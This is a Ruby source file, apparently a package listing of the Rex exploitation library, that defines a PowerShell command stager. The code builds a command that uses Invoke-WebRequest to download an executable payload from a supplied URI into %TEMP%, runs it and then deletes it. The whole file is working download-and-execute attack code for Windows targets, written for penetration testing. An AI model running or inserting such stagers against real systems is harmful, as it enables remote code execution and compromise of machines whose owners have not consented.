Sha256: 9711bb30ec56aa5be5576443d010e15de2dfd5efba05604de1244ab364f1e1cb
Contents?: true
Size: 948 Bytes
Versions: 18
Compression:
Stored size: 948 Bytes
Contents
# -*- coding: binary -*-
class Rex::Exploitation::CmdStagerPSHInvokeWebRequest < Rex::Exploitation::CmdStagerBase
def http?
true
end
def user_agent
/WindowsPowerShell/
end
def generate(opts = {})
if opts[:payload_uri].nil?
raise "#{self.class.name}##{__callee__} missing opts[:payload_uri]"
end
opts[:temp] ||= '%TEMP%'
opts[:file] ||= "#{Rex::Text.rand_text_alpha(8)}.exe"
@payload_path = "#{opts[:temp]}\\#{opts[:file]}"
super
end
def generate_cmds_payload(opts)
# NOTE: This requires PowerShell >= 3.0
cmd = "Invoke-WebRequest -OutFile #{@payload_path} #{opts[:payload_uri]}"
# TODO: Craft a better command line, probably with encoding
["powershell.exe -c #{cmd}"]
end
def generate_cmds_decoder(opts)
cmds = []
cmds << @payload_path
cmds << "del #{@payload_path}" unless opts[:nodelete]
cmds
end
def cmd_concat_operator
' & '
end
end
Version data entries
18 entries across 18 versions & 1 rubygems